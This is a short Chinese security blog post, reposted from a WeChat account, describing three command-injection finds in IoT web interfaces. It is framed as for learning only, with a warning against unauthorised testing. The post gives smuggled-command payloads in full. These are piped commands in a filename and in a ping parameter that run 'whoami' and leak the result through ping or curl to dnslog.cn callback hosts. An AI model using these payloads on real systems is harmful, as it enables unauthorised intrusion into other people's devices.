那年那日那些洞

admin 2022年10月8日13:51:24评论34 views字数 554阅读1分50秒阅读模式


那年那日那些洞


前言此文库主要是记录一年来一些有趣的漏洞,拿出来给大家分享一下,仅供学习参考,禁止对任何未授权的网站进行实操。此系列会持续更新~~~也欢迎大家投稿!!1.命令执行不说废话直接上图,这是一个iot的站所以有些功能点就很奇怪的

那年那日那些洞


那年那日那些洞

那年那日那些洞

修改filename里面的内容:111.wav|ping `whoami`.v5hy64.dnslog.cn


那年那日那些洞


那年那日那些洞

神奇吧,为什么我会想到在filename拼接语句呢

因为平时在上传点的filename也是有概率存在rce的,所以我就试了试


那年那日那些洞

那年那日那些洞



2.命令执行

还是iot的站

那年那日那些洞

那年那日那些洞


看到ping的字眼就要注意了,这个包很明显就是在ping 192.168.5.1

这个包,把192.168.5.1改成192.168.5.1|curl `whoami`.vi50t3.dnslog.cn 看看会怎么样

那年那日那些洞

那年那日那些洞

3.(惊掉你眼睛的)命令执行

同样还是iot的站,跟上面是同一个站点那年那日那些洞

这是试听的原始包。

那年那日那些洞

但是他的返回包是这样的

那年那日那些洞

于是在wav后缀后面加上|ping `whoami`.ykjxel.dnslog.cn

那年那日那些洞

那年那日那些洞

神奇吧!!!!!!!!!!

内容来源:https://www.yuque.com/docs/share/cf9baab8-22ed-4ebc-8ced-57845792a93c


原文始发于微信公众号(黑战士):那年那日那些洞

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年10月8日13:51:24
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   那年那日那些洞https://cn-sec.com/archives/1302195.html

发表评论

匿名网友 填写信息